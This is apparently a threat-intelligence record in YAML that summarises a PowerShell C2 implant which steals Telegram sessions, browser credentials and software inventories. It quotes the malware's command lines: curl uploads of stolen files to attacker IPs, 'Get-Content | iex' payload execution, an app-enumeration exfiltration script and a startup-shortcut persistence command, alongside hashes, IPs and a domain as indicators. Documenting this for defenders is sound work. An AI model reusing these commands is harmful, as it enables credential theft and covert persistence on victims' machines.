# Failed YAML extraction
# Timestamp: 2026-05-01T16:38:12.461181
# Response length: 3615 chars
# Input chunk preview: 'e current user session. Command output is captured and POST-ed back to /api/result, completing the C2 loop.Figure 10: Decoded PowerShell C2 implant showing system profiling routine and JSON beacon str'
# ============================================================

title: "C2 Implant and Post-Exploitation Modules Analysis"
description: The report details the analysis of a C2 implant and various post-exploitation modules used to steal Telegram sessions, enumerate installed software, collect browser data, inject shellcode into browsers for credential harvesting, and establish persistence.
attribution: ""
malware_families: []
cves: []
ttps:
  processes:
    - chrome.exe
    - msedge.exe
    - brave.exe
    - curl.exe
    - powershell.exe
  command_lines:
    - "curl.exe -X POST -k -H Auth: ufjqsmjsaydc9ub6t1e0psn8183lvu2z -H mid:a5785c96-0870-4626-a2c8-66feb263cbb0 -F \"file=@$tzlLqozIrkrE\" hxxps://83[.]136[.]209[.]22:8444/upload"
    - "powershell.exe -ep Bypass -c Get-Content %TEMP%\chromechip.log | iex"
  powershell:
    - "$uninstallKeys = @( 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*' ) # Collect metadata per app [pscustomobject]@{ Name=$_.DisplayName; Version=$_.DisplayVersion; InstallLocation=$_.InstallLocation EstimatedSizeMB = if ($_.EstimatedSize) { [math]::Round($_.EstimatedSize/1024,1) } else { $null } Scope = if ($_.PSPath -like '*HKCU*') { 'CurrentUser' } else { 'AllUsers' } Arch = if ($_.PSPath -like '*WOW6432Node*') { 'x86' } else { 'x64/Neutral' } } # Export and exfiltrate $username=$env:USERNAME $ppath=\"$env:TEMP\lg_$username\" $apps | Export-Csv $ppath -NoTypeInformation -Encoding UTF8 & curl.exe -k -X POST -H \"Auth:fwyan48umt1vimwqcqvhdd9u72a7qysi\" -H \"mid:a5785c96-0870-4626-a2c8-66feb263cbb0\" -F \"file=@$ppath\" hxxps://104[.]145[.]210[.]107:8444/upload Remove-Item -Path $ppath -Force"
    - "powershell.exe -ep Bypass -c Get-Content %TEMP%\chromechip.log | iex"
  scripts:
    - "{[Text.Encoding]::UTF8.GetString(...)}"
  registry_keys:
    - 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    - 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    - 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
  image_loads: []
  network_connections:
    - "curl.exe -> hxxps://104[.]145[.]210[.]107:8444/upload"
    - "curl.exe -> hxxps://83[.]136[.]209[.]22:8444/download?id=8766ceb975cadedca38aad72091017cdb5d3e4c8f8af0441"
    - "curl.exe -> hxxp://check02id[.]com:7365/hello"
  file_activity:
    - "%TEMP%\tel_<username>.zip"
    - "%TEMP%\lg_<username>"
    - "%TEMP%\ext_<username>.zip"
    - "%TEMP%\chromechip.log"
    - "C:\Users\Public\log.ini"
    - "C:\Users\Public\pchr.csv"
    - "C:\Users\Public\pmse.csv"
    - "C:\Users\Public\pbra.csv"
  persistence:
    - "Bootstrap payload (chrome-debug-data001.log) dropped to %USERPROFILE%\chrome-debug-data001.log"
    - "Startup LNK (Chrome Update Certificated.lnk) created in the users Startup folder targeting exe with arguments: /c powershell -ep Bypass -c Get-Content $sta | iex"
  process_relations:
    - "powershell.exe -> chrome.exe"
    - "powershell.exe -> msedge.exe"
    - "powershell.exe -> brave.exe"
iocs:
  hashes:
    - 17158cd6490a2b3c672d087f3d69107643d6a6f7c67345461b10ae18f27e28d1
    - db446f0e1d18b43805bfefe1af934ae4b0879e376904635cc7e14eae2d7fc682
    - 6030338469819129924C6E01E110145A128CA3D944CD4B696ABC7925A1840001
  ip_addresses:
    - 104.145.210.107
    - 83.136.209.22
    - 192.168.1[.]1
  domains:
    - check02id[.]com
  urls:
    - hxxps://104[.]145[.]210[.]107:8444/upload
    - hxxps://83[.]136[.]209[.]22:8444/download?id=8766ceb975cadedca38aad72091017cdb5d3e4c8f8af0441
    - hxxp://check02id[.]com:7365/hello
authors:
  - []